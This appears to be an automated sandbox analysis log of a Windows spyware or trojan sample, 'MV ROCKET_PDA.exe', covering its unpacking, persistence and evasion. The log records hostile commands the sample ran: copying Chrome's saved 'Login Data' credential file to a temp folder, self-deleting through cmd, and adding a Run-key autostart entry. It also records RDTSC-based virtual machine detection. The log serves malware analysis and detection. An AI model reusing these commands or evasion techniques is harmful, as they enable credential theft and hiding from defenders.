          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A598A0 NtWriteVirtualMemory,40_2_00A598A0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A598F0 NtReadVirtualMemory,40_2_00A598F0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59820 NtEnumerateKey,40_2_00A59820
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59840 NtDelayExecution,40_2_00A59840
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A5B040 NtSuspendThread,40_2_00A5B040
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A599A0 NtCreateSection,40_2_00A599A0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A599D0 NtCreateProcessEx,40_2_00A599D0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59950 NtQueueApcThread,40_2_00A59950
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59A80 NtOpenDirectoryObject,40_2_00A59A80
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59A20 NtResumeThread,40_2_00A59A20
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59A00 NtProtectVirtualMemory,40_2_00A59A00
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59A10 NtQuerySection,40_2_00A59A10
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59A50 NtCreateFile,40_2_00A59A50
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A5A3B0 NtGetContextThread,40_2_00A5A3B0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59B00 NtSetValueKey,40_2_00A59B00
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A595F0 NtQueryInformationFile,40_2_00A595F0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59520 NtWaitForSingleObject,40_2_00A59520
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A5AD30 NtSetContextThread,40_2_00A5AD30
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59560 NtWriteFile,40_2_00A59560
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59540 NtReadFile,40_2_00A59540
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A596D0 NtCreateKey,40_2_00A596D0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59610 NtEnumerateValueKey,40_2_00A59610
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59670 NtQueryInformationProcess,40_2_00A59670
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59650 NtQueryValueKey,40_2_00A59650
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A597A0 NtUnmapViewOfSection,40_2_00A597A0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59780 NtMapViewOfSection,40_2_00A59780
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59730 NtQueryVirtualMemory,40_2_00A59730
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59710 NtQueryInformationToken,40_2_00A59710
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A5A710 NtOpenProcessToken,40_2_00A5A710
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59760 NtOpenProcess,40_2_00A59760
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A5A770 NtOpenThread,40_2_00A5A770
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A59770 NtSetInformationFile,40_2_00A59770
          Source: MV ROCKET_PDA.exe, 00000000.00000003.274273875.000000000EABF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MV ROCKET_PDA.exe
          Source: MV ROCKET_PDA.exe, 00000001.00000002.326762800.0000000000B9F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MV ROCKET_PDA.exe
          Source: MV ROCKET_PDA.exe, 00000001.00000002.326398883.0000000000A69000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs MV ROCKET_PDA.exe
          Source: MV ROCKET_PDA.exeVirustotal: Detection: 37%
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeFile read: C:\Users\user\Desktop\MV ROCKET_PDA.exeJump to behavior
          Source: MV ROCKET_PDA.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\MV ROCKET_PDA.exe 'C:\Users\user\Desktop\MV ROCKET_PDA.exe'
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeProcess created: C:\Users\user\Desktop\MV ROCKET_PDA.exe 'C:\Users\user\Desktop\MV ROCKET_PDA.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MV ROCKET_PDA.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeProcess created: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe 'C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe'
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeProcess created: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe 'C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe 'C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe'
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeProcess created: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe 'C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe'
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeProcess created: C:\Users\user\Desktop\MV ROCKET_PDA.exe 'C:\Users\user\Desktop\MV ROCKET_PDA.exe' Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe 'C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe' Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe 'C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MV ROCKET_PDA.exe'Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /VJump to behavior
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeProcess created: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeJump to behavior
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeProcess created: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe 'C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe' Jump to behavior
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeProcess created: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe 'C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe' Jump to behavior
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeFile created: C:\Users\user\AppData\Local\Temp\nsk8EF8.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/11@37/15
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,0_2_00402053
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004042C1
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4648:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5456:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Binary string: wntdll.pdbUGP source: MV ROCKET_PDA.exe, 00000000.00000003.274631423.000000000E810000.00000004.00000001.sdmp, MV ROCKET_PDA.exe, 00000001.00000002.326762800.0000000000B9F000.00000040.00000001.sdmp, rundll32.exe, 0000000D.00000002.802558285.000000000542F000.00000040.00000001.sdmp, 5jsdph8p9l_r.exe, 00000025.00000003.749220704.000000000E9D0000.00000004.00000001.sdmp, 5jsdph8p9l_r.exe, 00000026.00000002.755084179.0000000000ADF000.00000040.00000001.sdmp, 5jsdph8p9l_r.exe, 00000027.00000003.774246170.000000000E860000.00000004.00000001.sdmp, 5jsdph8p9l_r.exe, 00000028.00000002.778988357.0000000000B0F000.00000040.00000001.sdmp, 5jsdph8p9l_r.exe, 00000029.00000003.788779918.000000000E9D0000.00000004.00000001.sdmp, 5jsdph8p9l_r.exe, 0000002A.00000002.793729863.0000000000AEF000.00000040.00000001.sdmp
          Source: Binary string: C:\xampp\htdocs\Loct\a907f411f4a1406680de5d21c8d82345\Loader\oocazquc\Release\oocazquc.pdb source: MV ROCKET_PDA.exe, 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp, 5jsdph8p9l_r.exe, 00000025.00000002.752407520.0000000000409000.00000004.00020000.sdmp, 5jsdph8p9l_r.exe, 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp, 5jsdph8p9l_r.exe, 00000029.00000002.791582542.0000000000409000.00000004.00020000.sdmp, lqnx.dll.39.dr
          Source: Binary string: wntdll.pdb source: 5jsdph8p9l_r.exe, 5jsdph8p9l_r.exe, 00000029.00000003.788779918.000000000E9D0000.00000004.00000001.sdmp, 5jsdph8p9l_r.exe, 0000002A.00000002.793729863.0000000000AEF000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdb source: MV ROCKET_PDA.exe, 00000001.00000002.326381141.0000000000A60000.00000040.00020000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: MV ROCKET_PDA.exe, 00000001.00000002.326381141.0000000000A60000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeUnpacked PE file: 1.2.MV ROCKET_PDA.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeUnpacked PE file: 38.2.5jsdph8p9l_r.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeUnpacked PE file: 40.2.5jsdph8p9l_r.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeUnpacked PE file: 42.2.5jsdph8p9l_r.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_0041B832 push eax; ret 1_2_0041B838
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_0041B83B push eax; ret 1_2_0041B8A2
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_0041B89C push eax; ret 1_2_0041B8A2
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00415BEB push ebp; retf 1_2_00415BEC
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_0041BEBC push ebp; ret 1_2_0041C32A
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_0041B7E5 push eax; ret 1_2_0041B838
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AFD0D1 push ecx; ret 1_2_00AFD0E4
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_1_0041B832 push eax; ret 1_1_0041B838
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_1_0041B83B push eax; ret 1_1_0041B8A2
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_1_0041B89C push eax; ret 1_1_0041B8A2
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_1_00415BEB push ebp; retf 1_1_00415BEC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0538D0D1 push ecx; ret 13_2_0538D0E4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0106B832 push eax; ret 13_2_0106B838
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0106B83B push eax; ret 13_2_0106B8A2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0106B89C push eax; ret 13_2_0106B8A2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_01065BEB push ebp; retf 13_2_01065BEC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0106C74D push 813462A6h; ret 13_2_0106C752
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0106B7E5 push eax; ret 13_2_0106B838
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0106BEBC push ebp; ret 13_2_0106C32A
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 38_2_00A3D0D1 push ecx; ret 38_2_00A3D0E4
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 40_2_00A6D0D1 push ecx; ret 40_2_00A6D0E4
          Source: lqnx.dll.41.drStatic PE information: real checksum: 0xe609 should be: 0x718d
          Source: lqnx.dll.39.drStatic PE information: real checksum: 0xe609 should be: 0x718d
          Source: lqnx.dll.37.drStatic PE information: real checksum: 0xe609 should be: 0x718d
          Source: MV ROCKET_PDA.exeStatic PE information: real checksum: 0x0 should be: 0x44034
          Source: 5jsdph8p9l_r.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x44034
          Source: lqnx.dll.0.drStatic PE information: real checksum: 0xe609 should be: 0x718d
          Source: initial sampleStatic PE information: section name: .data entropy: 7.76519804341
          Source: initial sampleStatic PE information: section name: .data entropy: 7.76519804341
          Source: initial sampleStatic PE information: section name: .data entropy: 7.76519804341
          Source: initial sampleStatic PE information: section name: .data entropy: 7.76519804341
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeFile created: C:\Users\user\AppData\Local\Temp\nsk8EF9.tmp\lqnx.dllJump to dropped file
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeFile created: C:\Users\user\AppData\Local\Temp\nsv161C.tmp\lqnx.dllJump to dropped file
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeFile created: C:\Users\user\AppData\Local\Temp\nsy35E9.tmp\lqnx.dllJump to dropped file
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeFile created: C:\Users\user\AppData\Local\Temp\nsfEE22.tmp\lqnx.dllJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\Gw4n\5jsdph8p9l_r.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run O0H8GLDXC6XJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run O0H8GLDXC6XJump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: /c del 'C:\Users\user\Desktop\MV ROCKET_PDA.exe'
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: /c del 'C:\Users\user\Desktop\MV ROCKET_PDA.exe'Jump to behavior
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000001058614 second address: 000000000105861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000010589AE second address: 00000000010589B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 6188Thread sleep time: -95000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_004088E0 rdtsc 1_2_004088E0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_00405EC2 FindFirstFileA,FindClose,0_2_00405EC2
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054EC
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0105FAA0 FindFirstFileW,FindNextFileW,FindClose,13_2_0105FAA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0105FA99 FindFirstFileW,FindNextFileW,FindClose,13_2_0105FA99
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 39_2_00405EC2 FindFirstFileA,FindClose,39_2_00405EC2
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 39_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,39_2_004054EC
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 39_2_00402671 FindFirstFileA,39_2_00402671
          Source: explorer.exe, 00000004.00000000.289356247.000000000EEEE000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}efb8b}
          Source: explorer.exe, 00000004.00000000.286121753.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.315377461.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000004.00000000.310975191.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.286121753.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000004.00000000.310975191.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000004.00000000.286121753.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_72E42170 gqeqcda,GetProcessHeap,RtlAllocateHeap,memset,EnumSystemCodePagesW,0_2_72E42170
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_004088E0 rdtsc 1_2_004088E0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_72E45572 mov eax, dword ptr fs:[00000030h]0_2_72E45572
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_72E458B4 mov eax, dword ptr fs:[00000030h]0_2_72E458B4
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_72E45786 mov eax, dword ptr fs:[00000030h]0_2_72E45786
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_72E45876 mov eax, dword ptr fs:[00000030h]0_2_72E45876
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_72E45837 mov eax, dword ptr fs:[00000030h]0_2_72E45837
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AE90AF mov eax, dword ptr fs:[00000030h]1_2_00AE90AF
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]1_2_00AD20A0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]1_2_00AD20A0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]1_2_00AD20A0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]1_2_00AD20A0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]1_2_00AD20A0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00AD20A0 mov eax, dword ptr fs:[00000030h]1_2_00AD20A0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ADF0BF mov ecx, dword ptr fs:[00000030h]1_2_00ADF0BF
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ADF0BF mov eax, dword ptr fs:[00000030h]1_2_00ADF0BF
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00ADF0BF mov eax, dword ptr fs:[00000030h]1_2_00ADF0BF
